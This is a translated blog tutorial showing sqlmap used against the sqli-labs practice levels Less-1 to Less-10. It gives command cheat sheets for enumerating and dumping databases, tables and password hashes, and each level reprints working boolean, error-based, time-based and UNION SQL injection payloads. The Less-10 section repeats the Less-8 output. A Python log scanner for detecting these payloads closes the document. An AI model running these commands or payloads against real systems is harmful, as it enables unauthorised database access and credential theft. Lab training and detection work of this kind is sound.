sqlmap against sqli-labs, part 01: Less-1 to Less-10

Before using it, we first give a rough overview of what sqlmap can be used for.
The following is taken from:

Copyright notice: this is an original article by CSDN blogger "小明师傅", released under the CC 4.0 BY-SA license; when reposting, please include a link to the original and this notice.
Original link: https://blog.csdn.net/qq_24030907/article/details/106541411

  • 0. Clear the sqlmap cache:
    Method 1: delete the contents of the output directory at C:\Users\dragoneyes\.sqlmap\output
    Method 2: sqlmap.py --purge

  • 1. Detect the injection point
    sqlmap -u <injection point>            check whether the injection point is usable
    sqlmap -u <injection point> --batch    answer all prompts automatically

  • 2. Dump the databases and database users
    sqlmap -u <injection point> --dbs            // list the databases
    Database currently used by the web application:
    sqlmap -u <injection point> --current-db     // the database currently in use

    • Account the web application uses for the database
      sqlmap -u <injection point> --current-user   // the account currently in use
    • List all sqlserver users
      sqlmap -u <injection point> --users          // list all accounts that have been used
  • 3. Database accounts and passwords
    sqlmap -u <injection point> --passwords      // MySQL login accounts and passwords

  • 4. List the tables in a database
    sqlmap -u <injection point> -D <database name> --tables   // (-D specifies the database name)

  • 5. List the columns of a table
    sqlmap -u <injection point> -D <database name> -T <table name> --columns

  • 6. Dump the column contents
    sqlmap -u <injection point> -D <database name> -T <table name> -C "email,username,userpassword" --dump   (export the results)

--risk: the risk level; there are four of them. The default, 1, runs most of the test statements; 2 adds time-based (heavy query) test statements; 3 adds OR-based SQL injection tests.

--level: there are five levels, the default being 1. When you are not sure which payload or which parameter is the injection point, a higher level value is recommended so that coverage is complete.

1. less01 - Error Based - String

Since this one is fairly simple, we can go straight to dumping the databases at the highest level:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbs

While the databases are being enumerated, we can see that sqlmap actually prints out the payloads that worked. Once you see these, you understand what is happening. The payloads are as follows:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4225=4225 AND 'gZcP'='gZcP

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(5094=5094,1))),0x71626a7171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'loNl'='loNl

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 1656 FROM (SELECT(SLEEP(5)))rOKe) AND 'cthH'='cthH

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8083' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x424c456c79416b53754b79614463647857484654456b76454966544364767747446a737173444955,0x71626a7171),NULL-- -
---

What follows are the regular steps, similar to those of manual injection:

1.1 View the current database

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --current-db


1.2 Enumerate the table names in the specified database: --dbms=mysql -D "security" --tables

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables


1.3 Enumerate the columns of the users table: -T "users" --col

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" --col


1.4 Enumerate the specified columns: -C "password,username" --dump

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump

As shown below, the whole database is laid out in front of us.

2. less02 - Error Based - Intiger

Similar to the first level; the individual commands are not listed one by one. The injection points sqlmap reports are as follows:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6989=6989

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178626a71,(SELECT (ELT(6000=6000,1))),0x7162706271,0x78))s), 8446744073709551610, 8446744073709551610)))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))XNPi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-3218 UNION ALL SELECT NULL,CONCAT(0x7178626a71,0x627549484c74714d6d63704b6c58725270757a6b644678537a7a714b6463415159534877596e796b,0x7162706271),NULL-- -
---

3. less03 - Error Based - String (with Twist)

Similar to the first level; the individual commands are not listed one by one. The injection points sqlmap reports are as follows:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 5965=5965 AND ('Uhxh'='Uhxh

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a6a7a71,(SELECT (ELT(4276=4276,1))),0x7178787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('DhTF'='DhTF

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 5032 FROM (SELECT(SLEEP(5)))ZpJN) AND ('qjGP'='qjGP

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-8381') UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6244626e745745795371456665544570755652784f4c6256444c794f4e6a787a654e474f4b767255,0x7178787671)-- -
---

4. less04 - Error Based - DoubleQuotes String

Similar to the first level; the individual commands are not listed one by one. The injection points sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1") AND 3072=3072#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6b7071,(SELECT (ELT(5205=5205,1))),0x716b626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("yfvD"="yfvD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1") AND (SELECT 3354 FROM (SELECT(SLEEP(5)))Cwyc) AND ("gvAz"="gvAz

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: id=-8029") UNION ALL SELECT NULL,CONCAT(0x716a6b7071,0x724d544d6171674c56465a6c4c7247716677484e4851686a4e63676b456e587a464669414c765268,0x716b626271),NULL#
---

5. less05 - Double Query - Single Quotes - String

Similar to the first level; the individual commands are not listed one by one. The payloads sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7188=7188 AND 'mqLE'='mqLE

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707071,(SELECT (ELT(6541=6541,1))),0x7170707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'aJRC'='aJRC

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8698 FROM (SELECT(SLEEP(5)))CBFA) AND 'fmva'='fmva
---

6. less06 - Double Query - Double Quotes - String

Similar to the first level; the individual commands are not listed one by one. The statements sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 221 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=1" AND 4582=4582#

    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
    Payload: id=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6b7071,(SELECT (ELT(8039=8039,1))),0x7178767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- uBIu

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1" AND (SELECT 8198 FROM (SELECT(SLEEP(5)))BnZi)-- XRBu
---

7. less07 - Dump into Outfile

Similar to the first level; the individual commands are not listed one by one. The statements sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1') AND 7606=7606 AND ('QcoM'='QcoM

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1') AND (SELECT 3053 FROM (SELECT(SLEEP(5)))oLyk) AND ('rXXO'='rXXO
---

8. less08 - Blind - Boolian - Single Quotes - String

Similar to the first level; the individual commands are not listed one by one. The statements sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7494=7494 AND 'UORd'='UORd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---

9. less09 - Blind - Time based - Single Quotes - String

Similar to the first level; the individual commands are not listed one by one. The statements sqlmap reports are as follows:

sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4639=4639 AND 'PEyr'='PEyr

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 8651 FROM (SELECT(SLEEP(5)))TJGQ) AND 'wKXs'='wKXs
---

10. less10 - Blind - Time based - Double Quotes - String

Similar to the first level; the individual commands are not listed one by one. When enumerating all the databases here, the level and risk have to be specified explicitly, as follows:

C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-8/?id=1" --current-db --level=5 --risk=3

The statements sqlmap reports are as follows:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 7494=7494 AND 'UORd'='UORd

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---
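The payload listings for Less-1 through Less-10 above differ only in the technique (boolean-based, error-based, time-based, UNION) and in the quote or parenthesis that closes the original literal. As an added defender-side example (not part of the original post or of sqlmap itself), the following Python scans web-server access-log lines for exactly those shapes and reports, per request, which technique was used and which quoting context it targeted; the combined log format, the sample log lines and the sqlmap User-Agent string are assumptions.

```python
import re
from urllib.parse import parse_qsl, quote
# Signatures for the four techniques sqlmap reported against Less-1..Less-10 (lower-cased value).
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:and|or)\s+(\d+)=\1\b"),         # AND 4225=4225
    "error-based": re.compile(r"8446744073709551610|\bselect\s+2\*\(if\("),  # BIGINT overflow
    "time-based blind": re.compile(r"\bsleep\(\s*\d+\s*\)|\bbenchmark\("),   # SLEEP(5)
    "UNION query": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
}
# Quote/paren used to close the original literal: the context that distinguishes Less-1..Less-10.
CONTEXT = re.compile(r"""^\s*-?\d+("\)|'\)|"|'|\))?""")
CONTEXT_NAMES = {None: "integer", "'": "single quote", '"': "double quote",
                 "')": "single quote + paren", '")': "double quote + paren"}
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')  # combined log format (assumed)

def classify(value):
    """Return (matched technique names, quoting context) for one URL-decoded parameter value."""
    techniques = [name for name, rx in SIGNATURES.items() if rx.search(value.lower())]
    m = CONTEXT.match(value)
    return techniques, (CONTEXT_NAMES[m.group(1)] if m else "unknown")

def scan_access_log(lines):
    """Return one finding per request whose query string carries an injection signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        query = m.group("target").partition("?")[2]
        for param, value in parse_qsl(query, keep_blank_values=True):  # parse_qsl URL-decodes
            techniques, context = classify(value)
            if techniques:
                findings.append({"ip": m.group("ip"), "param": param, "context": context,
                                 "techniques": techniques, "sqlmap_ua": "sqlmap" in m.group("ua").lower()})
    return findings

def log_line(path, payload, ua):
    # Build a constructed combined-format log line, URL-encoding the payload as a client would.
    return (f'192.168.1.50 - - [10/Jun/2020:21:03:11 +0800] "GET {path}?id={quote(payload, safe="")} '
            f'HTTP/1.1" 200 742 "-" "{ua}"')

# Constructed sample log: id values are the payloads printed above for Less-1, Less-2, Less-4 (shortened), Less-7.
UA = "sqlmap/1.4#stable (http://sqlmap.org)"  # assumed sqlmap User-Agent string
SAMPLE_LOG = [
    log_line("/Less-1/", "1", "Mozilla/5.0"),  # ordinary request, must not be flagged
    log_line("/Less-1/", "1' AND 4225=4225 AND 'gZcP'='gZcP", UA),
    log_line("/Less-2/", "1 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))XNPi)", UA),
    log_line("/Less-4/", '-8029") UNION ALL SELECT NULL,CONCAT(0x716a6b7071,0x72,0x716b626271),NULL#', UA),
    log_line("/Less-7/", "1') AND 7606=7606 AND ('QcoM'='QcoM", UA),
]
```

Running `scan_access_log(SAMPLE_LOG)` flags the four sqlmap requests and leaves the plain `id=1` request alone; the reported context tells you which quoting style the vulnerable query used, which is the first thing to check when fixing the code.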